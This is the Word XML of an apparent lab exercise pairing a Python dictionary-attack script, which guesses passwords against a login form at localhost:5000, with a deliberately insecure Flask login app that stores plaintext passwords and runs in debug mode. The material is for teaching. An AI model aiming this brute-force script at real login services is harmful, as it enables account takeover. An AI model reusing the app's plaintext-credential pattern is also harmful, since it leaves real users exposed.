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74F32" w14:textId="43F70A2F" w:rsidR="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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Online Cracker Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303764D1" w14:textId="77777777" w:rsidR="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="55584DEF" w14:textId="4195F07B" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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import requests  # For making HTTP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B2AFA7" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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import time      # For simulating delays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D096DBC" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="4DC3BDDB" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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TARGET_URL = "http://127.0.0.1:5000/"  # URL of the vulnerable web application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69575E5C" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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USERNAME_TO_ATTACK = "testuser"       # Username to target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CBED86" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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DICTIONARY_FILE = "dictionary.txt"    # Dictionary file for passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564226B" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="2D893C90" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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def perform_online_attack(target_url, username, dictionary_file):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E5240D" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A4C1FD" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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Performs an online dictionary attack against a login form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB2FABF" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="794A6A8B" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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Args:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E64BC2" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    target_url (str): URL of the login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF535A8" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    username (str): Username to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49184240" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    dictionary_file (str): Path to the dictionary file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B27162" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="52B4982A" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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Returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753E5BBF" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    str or None: The cracked password if found, otherwise None.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74529C14" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203AA879" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055DF184" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    with open(dictionary_file, "r") as dict_file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00071A57" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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        for password in dict_file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A36BA" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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            password = password.strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70623D1C" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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            print(f"[*] Trying password: {password}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF43DA" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="416AAC3B" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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            # Data to send in the POST request (form data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E2974" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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            login_data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B690EB3" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                "username": username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2865AE6A" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                "password": password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0D3A0" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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F238707" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="20FFF295" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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            try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A0C35" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                response = requests.post(target_url, data=login_data) # Send POST request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A830B13" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                # Simulate a small delay between attempts (important for real-world scenarios - rate limiting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304C85C2" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                time.sleep(0.5) # 0.5 seconds delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B4439D" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="5892933C" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                # Check for successful login (This is VERY application-specific)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A273D4B" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                if "Login Successful!" in response.text: # Check for text in the response indicating success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E671E38" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                    print(f"\n[+] Password Cracked for username '{username}'! Password is: {password}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF181E" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                    return password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794D2590" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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lastRenderedPageBreak/>
        <w:t>                    elif "Invalid credentials" in response.text: # Optional: Check for failure message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA71075" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                    pass # Login failed, try next password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F17D1" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1996D" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                    print(f"[!] Unexpected response for password '{password}': Status Code: {response.status_code}, Content: {response.text[:100]}...") # Debugging for unexpected responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C579EAB" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="486F0F8A" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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            except requests.exceptions.RequestException as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B40011" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                print(f"[!] Request error for password '{password}': {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F736B55" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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                continue # Move to the next password in case of network errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E98FF2" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="6043F853" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    print(f"[-] Password not found in the dictionary for username '{username}'.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A77F2" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F8590F" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="0C7D3545" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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except FileNotFoundError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7160FA" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    print(f"Error: Dictionary file '{dictionary_file}' not found.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA2172D" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275FE507" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F604E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</w:p>
    <w:p w14:paraId="24E2028E" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D88C03B" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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"""Main function to run the online password cracking demonstration."""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52434537" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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print("--- Basic Online Password Cracking (Dictionary Attack) ---")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C32824" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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print("WARNING: Use this for EDUCATIONAL PURPOSES ONLY against your LOCAL vulnerable app!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE7F320" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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print("         Unauthorized online password cracking is ILLEGAL and unethical.\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3366EAD1" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="0E4B25C0" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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cracked_password = perform_online_attack(TARGET_URL, USERNAME_TO_ATTACK, DICTIONARY_FILE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3F7B6" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="7172ED76" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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if cracked_password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610CBAE1" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    print(f"\n[+] Online Password Cracking Successful! Cracked Password: {cracked_password}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406A430C" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B001F" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    print("\n[-] Online Password Cracking Failed.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20607A28" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F604E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</w:p>
    <w:p w14:paraId="303B22A7" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD3D81" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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# Create a small example dictionary file (dictionary.txt) if it doesn't exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D59B9" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D080293" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    with open("dictionary.txt", "x") as f: # 'x' mode: create if not exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07577854" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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        f.write("password\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AFE776" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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        f.write("password123\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144F7582" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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        f.write("123456\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475BB552" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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lastRenderedPageBreak/>
        <w:t>            f.write("qwerty\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2447F45D" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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        f.write("admin\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77766B00" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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        f.write("secret\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F3C954" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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        f.write("test\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F4566" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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        f.write("demo123\n") # Add 'demo123' to dictionary for 'demo' user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18964880" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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except FileExistsError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5868264C" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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3F604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    pass # Dictionary file already exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E921C9C" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F60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</w:p>
    <w:p w14:paraId="36604ED6" w14:textId="77777777" w:rsidR="003F604E" w:rsidRPr="003F604E" w:rsidRDefault="003F604E" w:rsidP="003F604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3F604E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main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F8483" w14:textId="77777777" w:rsidR="0089648C" w:rsidRDefault="0089648C"/>
    <w:p w14:paraId="03FF4260" w14:textId="77777777" w:rsidR="0089648C" w:rsidRDefault="0089648C"/>
    <w:p w14:paraId="2FA57874" w14:textId="4C559A5C" w:rsidR="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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Vulnerable_app.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2B3918" w14:textId="77777777" w:rsidR="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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</w:p>
    <w:p w14:paraId="0F7C2AC3" w14:textId="7A0AD21A" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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from flask import Flask, render_template, request, redirect, url_for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29813150" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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</w:p>
    <w:p w14:paraId="5C4DA5EC" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E3431A" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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</w:p>
    <w:p w14:paraId="0E91F34C" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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# Insecure storage of credentials (for demonstration ONLY - NEVER do this in real apps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102F5C97" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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USERS = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FFC641" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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"testuser": "password123",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06656456" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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"admin": "adminpass",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC6FDF9" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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"demo": "demo123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A2547" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0344FD52" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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</w:p>
    <w:p w14:paraId="08B6F52E" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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@app.route('/', methods=['GET', 'POST'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE896A4" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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def login():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE7F381" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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error = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73754FA3" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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if request.method == 'POST':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D0DC2" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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    username = request.form['username']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3685BAE5" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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    password = request.form['password']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435FC0ED" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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</w:p>
    <w:p w14:paraId="4B7926DA" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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    if username in USERS and USERS[username] == password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D46279" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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        return render_template('login_success.html', username=username)  # Successful login page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2774D" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437996B" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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        error = 'Invalid credentials. Please try again.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405838D" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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</w:p>
    <w:p w14:paraId="22947E5C" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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return render_template('login_form.html', error=error)  # Login form page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0437F" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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</w:p>
    <w:p w14:paraId="2BEA4232" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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@app.route('/login_success') # Just for demonstration, not directly used in attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FA3096" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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def login_success():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26BBB8" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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username = request.args.get('username')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FC316C" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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return render_template('login_success.html', username=username)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300E32F" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="0089648C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</w:p>
    <w:p w14:paraId="04187219" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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89648C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lastRenderedPageBreak/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DDCB7A" w14:textId="77777777" w:rsidR="0089648C" w:rsidRPr="0089648C" w:rsidRDefault="0089648C" w:rsidP="008964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</w:pPr>
      <w:r w:rsidRPr="0089648C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/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>    app.run(debug=True, port=5000) # Run locally on port 5000, debug mode for development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB02836" w14:textId="342B80F7" w:rsidR="00817D6F" w:rsidRDefault="003F604E">
      <w:r w:rsidRPr="003F604E">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A3BCB0A" wp14:editId="39A260EA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>707390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2957195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21428"/>
                <wp:lineTo x="21538" y="21428"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="1032289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28909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604E">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18DB2A91" wp14:editId="155A05EF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5344342</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2871470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21495"/>
                <wp:lineTo x="21538" y="21495"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="1535041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041855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17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DF5"/>
    <w:rsid w:val="00024DF5"/>
    <w:rsid w:val="003D4170"/>
    <w:rsid w:val="003F604E"/>
    <w:rsid w:val="00740D07"/>
    <w:rsid w:val="00817D6F"/>
    <w:rsid w:val="0089648C"/>
    <w:rsid w:val="00956D1B"/>
    <w:rsid w:val="00AC21A8"/>
